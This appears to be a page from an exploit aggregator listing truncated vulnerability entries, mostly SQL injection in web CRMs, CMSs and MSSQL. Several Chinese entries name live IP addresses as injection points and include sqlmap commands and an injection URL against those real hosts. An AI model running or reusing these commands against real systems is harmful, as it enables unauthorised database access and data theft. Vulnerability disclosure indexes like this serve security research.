Crescendo - Sales CRM Authentication Bypass Vulnerability

Exploit for asp platform in category web applications Crescendo - Sales CRM Authentication Bypass Vulnerability Exploit Title: Crescendo - Sales CRM Authentication Bypass Vulnerability Sql Injection Google Dork: N/A Date: July 15 , 2014 Exploit Author: Monendra Sahu email protected Vendor Homepag...

Crescendo - Sales CRM SQL Injection

Crescendo - Sales CRM Authentication Bypass Vulnerability Exploit Title: Crescendo - Sales CRM Authentication Bypass Vulnerability Sql Injection Google Dork: N/A Date: July 15 , 2014 Exploit Author: Monendra Sahu [email protected] Vendor Homepage: http://dejavuprotech.com/crecendo.php Test...

Medium: php54

Issue Overview: acinclude.m4, as used in the configure script in PHP 5.5.13 and earlier, allows local users to overwrite arbitrary files via a symlink attack on the /tmp/phpglibccheck file. A denial of service flaw was found in the way the File Information fileinfo extension parsed certain...

DirectControlTM Version 3.1.7.0 - Multiple Vulnerabilties

No description provided by source. DirectControlTM Version 3.1.7.0 - Multiple Vulnerabilties ==================================================================== .:. Author : AtT4CKxT3rR0r1ST .:. Contact : [email protected] , [email protected] .:. Home : http://www.iphobos.com/blog/ .:. Script...

Chipmunk Board 1.3 (index.php?forumID) SQL Injection

No description provided by source. Exploit Title: Chipmunk Board index.php?forumID Remote SQL Injection Vulnerability Date: October, 01 st 2010 Author: Shamus Software Link: http://www.chipmunk-scripts.com/board/board.zip Version: Chipmunk Forums Version 1.3 Tested on: windows CVE : -...

Ferdows CMS Pro <= 1.1.0 - Multiple Vulnerabilities

No description provided by source. www.BugReport.ir AmnPardaz Security Research Team Title: Ferdows CMS Pro =1.1.0 Multiple Vulnerabilities Vendor: www.fcms.ir Exploit: Available Vulnerable Version: 1.1.0 Pro Impact: Medium Original Advisory: http://www.bugreport.ir/index77.htm Fix: N/A 1...

Microsoft SQL Server Payload Execution via SQL injection

No description provided by source. $Id: mssqlpayloadsqli.rb 11730 2011-02-08 23:31:44Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms o...

saspcms 0.9 - Multiple Vulnerabilities

No description provided by source. www.BugReport.ir AmnPardaz Security Research Team Title: SASPCMS Multiple Vulnerabilities Vendor: http://www.lgasoft.com Vulnerable Version: 0.9 prior versions also may be affected Exploitation: Remote with browser Fix: N/A - Description: SASPCMS is an ASP Conte...

LimeSurvey 2.00+ (build 131107) - Multiple Vulnerabilities

No description provided by source. ? LimeSurvey v2.00+ build 131107 Script Insertion And SQL Injection Vulnerability Vendor: LimeSurvey Project Team Product web page: http://www.limesurvey.org Affected version: 2.00+ build 131009 2.00+ build 131022 2.00+ build 131031 2.00+ build 131107 Summary:...

MSSQL 7.0 - Remote Denial of Service Exploit

No description provided by source...

411cc Multiple SQL Injection Vulnerabilities

No description provided by source. =================================================================== 411CC e-Commerce = String' SQL Injection Vulnerabilities =================================================================== My + Author : KnocKout Contact : [email protected] Software info Web...

BPHolidayLettings 1.0 - Blind SQL Injection

No description provided by source. x========================================================================================================================================x | AntiSecuritydotorg |...

Microsoft SQL Server Resolution Overflow

No description provided by source. $Id: ms02039slammer.rb 9179 2010-04-30 08:40:19Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of...

ColdUserGroup 1.06 - Blind SQL Injection Exploit

No description provided by source. !/usr/bin/python ColdGen - coldusergroup v1.06 0day Remote Blind SQL Injection Exploit Vendor: http://www.coldgen.com/ Found by: mrme ----------------------------------------------- Script provided 'as is', without any warranty. Use for educational purposes only...

用友某通用系统sql注入

简要描述： 用友某通用系统注入 详细说明： 用友TurboCRM存在通用sql注入。 http://220.178.27.116:8001/background/recievesms.php?ID=1 ID参数未做过滤存在mssql timebased盲注。 sqlmap.py -u "http://220.178.27.116:8001//background/recievesms.php?ID=1" --dbs --current-user --current-db --is-dba master model msdb tempdb turbocrm70 UFDATA0012011...

金蝶一处SQL注入

简要描述： 我胡汉三又回来了. 那么多的库 那么大的权限 我才不继续搞呢 点到为止:...

逐浪CMSSQL注入及绕过

简要描述： 官网及demo站点演示，绕过注入过滤。 详细说明： 这个点： http://www.zoomla.cn/Search/SearchList.aspx?node=1%20aNd%20@@version%3E0&keyword=2013 http://demo.zoomla.cn/Search/SearchList.aspx?node=1%20aNd%20@@version%3E0&keyword=2013 这样一下：...

Hostscan - PHP tool for scanning specific range of hosts

Hostscan is a php tool which allows you to scan specific range of hosts, mostly for information gathering and testing for weak passwords. I guess it's a pentest tool, i'd created it to automate some tests that i often do. Since it's PHP, it works quite slowly compared to client-side soft. How it...

SQL Servers MSSQL Vendor-specific SQL Injection

SQL injection techniques can allow remote attackers to execute SQL commands on SQL servers. Successful exploitation could allow attacker to disclose confidential information, modify or shut down the database or execute arbitrary code on affected servers...

博云非书资料管理系统SQL注入

简要描述： JSP+MSSQL，能搜到的使用该系统的网站不多，但多为大学学院使用 详细说明： 注入点: http://211.68.196.67:808/poweb/asearch.do?LanguageType=0&status=showpage 参数:LanguageType C:\Python27\sqlmapsqlmap.py -u "http://211.68.196.67:808/poweb/asearch.do?Langu ageType=0&status=showpage" --dbms=mssql sqlmap/1.0-dev - automatic SQL...